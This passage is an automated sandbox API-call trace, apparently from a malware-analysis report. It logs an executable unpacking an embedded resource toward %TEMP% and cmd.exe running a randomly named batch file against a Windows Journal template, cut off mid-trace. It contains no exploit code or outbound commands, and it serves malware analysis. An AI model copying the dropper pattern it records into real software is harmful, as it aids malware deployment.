¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0222.284] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ§¸þÉäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0222.284] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x80) returned 0x668250 [0222.284] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0222.284] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0222.284] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x668250) returned 0x80 [0222.285] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0222.285] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0222.285] GetCurrentProcess () returned 0xffffffff [0222.285] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0222.285] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0222.285] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0222.285] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0222.285] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0222.285] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0222.285] LockResource (hResData=0x43c648) returned 0x43c648 [0222.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6682d8 [0222.286] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0222.287] GetLastError () returned 0x20 [0222.287] GetLastError () returned 0x20 [0222.287] SetLastError (dwErrCode=0x20) [0222.287] GetLastError () returned 0x20 [0222.287] SetLastError (dwErrCode=0x20) [0222.287] GetLastError () returned 0x20 [0222.287] SetLastError (dwErrCode=0x20) [0222.287] GetLastError () returned 0x20 [0222.287] SetLastError (dwErrCode=0x20) [0222.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1000) returned 0x669820 [0222.288] GetLastError () returned 0x20 [0222.288] SetLastError (dwErrCode=0x20) [0222.288] GetLastError () returned 0x20 [0222.288] SetLastError (dwErrCode=0x20) [0222.288] GetLastError () returned 0x20 [0222.288] SetLastError (dwErrCode=0x20) [0222.288] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0222.289] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0222.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x667820 | out: hHeap=0x650000) returned 1 [0222.894] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0222.894] ExitProcess (uExitCode=0x1) [0222.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6660c8 | out: hHeap=0x650000) returned 1 Process: id = "223" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1d0ac000" os_pid = "0x540" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 807 os_tid = 0x24c [0228.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fcdc | out: lpSystemTimeAsFileTime=0x14fcdc*(dwLowDateTime=0x3f3e8ca0, dwHighDateTime=0x1d68287)) [0228.135] GetCurrentProcessId () returned 0x540 [0228.135] GetCurrentThreadId () returned 0x24c [0228.135] GetTickCount () returned 0x1164847 [0228.135] QueryPerformanceCounter (in: lpPerformanceCount=0x14fcd4 | out: lpPerformanceCount=0x14fcd4*=34847422986) returned 1 [0228.137] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0228.137] __set_app_type (_Type=0x1) [0228.137] __p__fmode () returned 0x770331f4 [0228.137] __p__commode () returned 0x770331fc [0228.137] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0228.138] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0228.138] GetCurrentThreadId () returned 0x24c [0228.138] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x24c) returned 0x60 [0228.138] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0228.138] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0228.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.209] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0228.209] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc6c | out: phkResult=0x14fc6c*=0x0) returned 0x2 [0228.210] VirtualQuery (in: lpAddress=0x14fca3, lpBuffer=0x14fc3c, dwLength=0x1c | out: lpBuffer=0x14fc3c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0228.210] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc3c, dwLength=0x1c | out: lpBuffer=0x14fc3c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0228.210] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc3c, dwLength=0x1c | out: lpBuffer=0x14fc3c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0228.210] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fc3c, dwLength=0x1c | out: lpBuffer=0x14fc3c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0228.210] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fc3c, dwLength=0x1c | out: lpBuffer=0x14fc3c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0228.210] GetConsoleOutputCP () returned 0x1b5 [0228.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.210] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0228.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.210] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0228.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.211] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0228.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.211] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.212] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.212] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0228.212] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.212] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0228.213] GetEnvironmentStringsW () returned 0x402108* [0228.213] GetProcessHeap () returned 0x3f0000 [0228.213] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xaca) returned 0x402be0 [0228.213] FreeEnvironmentStringsW (penv=0x402108) returned 1 [0228.213] GetProcessHeap () returned 0x3f0000 [0228.213] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4) returned 0x4018a8 [0228.213] GetEnvironmentStringsW () returned 0x402108* [0228.213] GetProcessHeap () returned 0x3f0000 [0228.213] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xaca) returned 0x4036b8 [0228.214] FreeEnvironmentStringsW (penv=0x402108) returned 1 [0228.214] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebdc | out: phkResult=0x14ebdc*=0x68) returned 0x0 [0228.214] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x0, lpData=0x14ebe8*=0x0, lpcbData=0x14ebe0*=0x1000) returned 0x2 [0228.214] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x1, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.214] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x0, lpData=0x14ebe8*=0x1, lpcbData=0x14ebe0*=0x1000) returned 0x2 [0228.214] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x0, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.214] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x40, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.214] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x40, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.214] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x0, lpData=0x14ebe8*=0x40, lpcbData=0x14ebe0*=0x1000) returned 0x2 [0228.214] RegCloseKey (hKey=0x68) returned 0x0 [0228.214] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebdc | out: phkResult=0x14ebdc*=0x68) returned 0x0 [0228.215] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x0, lpData=0x14ebe8*=0x40, lpcbData=0x14ebe0*=0x1000) returned 0x2 [0228.215] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x1, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.215] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x0, lpData=0x14ebe8*=0x1, lpcbData=0x14ebe0*=0x1000) returned 0x2 [0228.215] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x0, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.215] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x9, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.215] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x4, lpData=0x14ebe8*=0x9, lpcbData=0x14ebe0*=0x4) returned 0x0 [0228.215] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebe4, lpData=0x14ebe8, lpcbData=0x14ebe0*=0x1000 | out: lpType=0x14ebe4*=0x0, lpData=0x14ebe8*=0x9, lpcbData=0x14ebe0*=0x1000) returned 0x2 [0228.215] RegCloseKey (hKey=0x68) returned 0x0 [0228.215] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2fc [0228.215] srand (_Seed=0x5f51e2fc) [0228.215] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"\"" [0228.215] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"\"" [0228.217] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.217] GetProcessHeap () returned 0x3f0000 [0228.217] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x210) returned 0x402108 [0228.217] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x402110, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0228.218] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0228.218] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0228.218] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0228.218] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0228.218] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0228.218] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0228.218] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0228.218] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0228.218] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0228.218] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0228.218] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0228.218] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0228.218] GetProcessHeap () returned 0x3f0000 [0228.218] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x402be0 | out: hHeap=0x3f0000) returned 1 [0228.218] GetEnvironmentStringsW () returned 0x402320* [0228.218] GetProcessHeap () returned 0x3f0000 [0228.218] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xae2) returned 0x404c80 [0228.219] FreeEnvironmentStringsW (penv=0x402320) returned 1 [0228.219] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.219] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0228.219] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0228.219] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0228.219] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0228.219] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0228.219] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0228.219] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0228.219] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0228.219] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0228.219] GetProcessHeap () returned 0x3f0000 [0228.219] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x54) returned 0x4017d8 [0228.219] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f9a8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f9a8, lpFilePart=0x14f9a4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f9a4*="Desktop") returned 0x25 [0228.219] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0228.220] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f724 | out: lpFindFileData=0x14f724*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x405770 [0228.220] FindClose (in: hFindFile=0x405770 | out: hFindFile=0x405770) returned 1 [0228.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f724 | out: lpFindFileData=0x14f724*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x405770 [0228.220] FindClose (in: hFindFile=0x405770 | out: hFindFile=0x405770) returned 1 [0228.220] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0228.221] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f724 | out: lpFindFileData=0x14f724*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x405770 [0228.221] FindClose (in: hFindFile=0x405770 | out: hFindFile=0x405770) returned 1 [0228.221] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0228.221] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0228.221] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0228.221] GetProcessHeap () returned 0x3f0000 [0228.221] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404c80 | out: hHeap=0x3f0000) returned 1 [0228.221] GetEnvironmentStringsW () returned 0x404190* [0228.221] GetProcessHeap () returned 0x3f0000 [0228.221] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb36) returned 0x405fb0 [0228.221] FreeEnvironmentStringsW (penv=0x404190) returned 1 [0228.221] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.221] GetProcessHeap () returned 0x3f0000 [0228.222] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4017d8 | out: hHeap=0x3f0000) returned 1 [0228.222] GetProcessHeap () returned 0x3f0000 [0228.222] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400e) returned 0x406af0 [0228.222] GetProcessHeap () returned 0x3f0000 [0228.222] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xf0) returned 0x402e60 [0228.222] GetProcessHeap () returned 0x3f0000 [0228.222] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4008) returned 0x40ab08 [0228.222] GetProcessHeap () returned 0x3f0000 [0228.223] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4008) returned 0x40eb18 [0228.223] GetProcessHeap () returned 0x3f0000 [0228.223] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406af0 | out: hHeap=0x3f0000) returned 1 [0228.223] GetConsoleOutputCP () returned 0x1b5 [0228.223] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.223] GetUserDefaultLCID () returned 0x409 [0228.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0228.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fae8, cchData=128 | out: lpLCData="0") returned 2 [0228.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fae8, cchData=128 | out: lpLCData="0") returned 2 [0228.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fae8, cchData=128 | out: lpLCData="1") returned 2 [0228.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0228.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0228.225] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0228.225] 